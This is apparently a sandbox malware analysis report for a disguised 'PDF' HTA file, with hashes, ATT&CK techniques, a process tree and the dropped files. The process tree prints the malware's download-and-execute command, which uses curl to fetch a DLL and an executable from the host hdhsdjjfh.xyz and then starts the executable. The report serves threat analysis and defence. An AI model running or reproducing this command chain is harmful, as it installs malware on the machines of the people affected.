1c1106b3c5cdbe492283a89afb11e37186961a5dd6ef08ff59bf6a3cad6bb53e

Analysis

max time kernel
151s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
09-10-2023 07:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PDF-25003783999603006904.hta
Size

10KB
MD5

0511f1832cf8b26ae2db6519a434a0dc
SHA1

d8193b57e18ccd78ac6e6ba2e4d766bfd5e65962
SHA256

1c1106b3c5cdbe492283a89afb11e37186961a5dd6ef08ff59bf6a3cad6bb53e
SHA512

a7dd131897b3d82a7d6cdd611edd6c3f777b22636d3497063bb8bf035752affe610e957a9947670059c3b113adbbe30f87a2c3078a46d66f2974502f73ebda1e
SSDEEP

192:C6WEg4srZsU4oDnEDzKDy+0/mdJmp0+AVLxd5EwULn5xHV8b0:Cl4sVsU4oDnQAmpAhxxsn3j

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

pid	Process
4612	23756326.exe

Loads dropped DLL 1 IoCs

pid	Process
4612	23756326.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4612	23756326.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
4612	23756326.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 4932 wrote to memory of 2896	4932	mshta.exe	86
PID 4932 wrote to memory of 2896	4932	mshta.exe	86
PID 4932 wrote to memory of 2896	4932	mshta.exe	86
PID 2896 wrote to memory of 1692	2896	cmd.exe	88
PID 2896 wrote to memory of 1692	2896	cmd.exe	88
PID 2896 wrote to memory of 1692	2896	cmd.exe	88
PID 2896 wrote to memory of 4568	2896	cmd.exe	89
PID 2896 wrote to memory of 4568	2896	cmd.exe	89
PID 2896 wrote to memory of 4568	2896	cmd.exe	89
PID 4568 wrote to memory of 3548	4568	cmd.exe	90
PID 4568 wrote to memory of 3548	4568	cmd.exe	90
PID 4568 wrote to memory of 3548	4568	cmd.exe	90
PID 2896 wrote to memory of 4612	2896	cmd.exe	91
PID 2896 wrote to memory of 4612	2896	cmd.exe	91
PID 2896 wrote to memory of 4612	2896	cmd.exe	91

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\PDF-25003783999603006904.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4932
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c curl http://hdhsdjjfh.xyz/Lightshot.dll --output C:\GDSDHSGS\Lightshot.dll & cmd.exe /c curl http://hdhsdjjfh.xyz/23756326.exe --output C:\GDSDHSGS\23756326.exe & start C:\GDSDHSGS\23756326.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Windows\SysWOW64\curl.exe
    curl http://hdhsdjjfh.xyz/Lightshot.dll --output C:\GDSDHSGS\Lightshot.dll
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c curl http://hdhsdjjfh.xyz/23756326.exe --output C:\GDSDHSGS\23756326.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Windows\SysWOW64\curl.exe
      curl http://hdhsdjjfh.xyz/23756326.exe --output C:\GDSDHSGS\23756326.exe
      4⤵
      PID:3548
- - C:\GDSDHSGS\23756326.exe
    C:\GDSDHSGS\23756326.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\GDSDHSGS\23756326.exe

Filesize
487KB

MD5
1e1c83b9680029ad4a9f8d3b3ac93197

SHA1
fa7b69793454131a5b21b32867533305651e2dd4

SHA256
0b899508777d7ed5159e2a99a5eff60c54d0724493df3d630525b837fa43aa51

SHA512
fe6f8df3dbbcc7535ead60028ec3e45801a33ccc81c9137b2288bc0d18be42379564c907eb406ce9491f46930690efa9a86a9f6506414992b5dba75adb3d1136

Download Submit
C:\GDSDHSGS\Lightshot.dll

Filesize
4.7MB

MD5
3ffdcb703e2f8fea227c51010a8584ce

SHA1
43e6cd4ea4ba2253fe0eacbce17f4d6bfc415ddc

SHA256
83842ba0335f3e439097b957bdcd690a010a66e194c43d38f6cc9a9940a1e777

SHA512
b58359fab319dde1dd8ac9d60b13970eea1a9ac7a0b7394b5afaf264b46dad98c65530bd53fdc197440fe65a31c17c6e90bb66291242a8f3d640cb042f86f166

Download Submit
C:\GDSDHSGS\Lightshot.dll

Filesize
4.7MB

MD5
3ffdcb703e2f8fea227c51010a8584ce

SHA1
43e6cd4ea4ba2253fe0eacbce17f4d6bfc415ddc

SHA256
83842ba0335f3e439097b957bdcd690a010a66e194c43d38f6cc9a9940a1e777

SHA512
b58359fab319dde1dd8ac9d60b13970eea1a9ac7a0b7394b5afaf264b46dad98c65530bd53fdc197440fe65a31c17c6e90bb66291242a8f3d640cb042f86f166

Download Submit
memory/4612-6-0x00000000708D0000-0x0000000070D84000-memory.dmp

Filesize
4.7MB

Download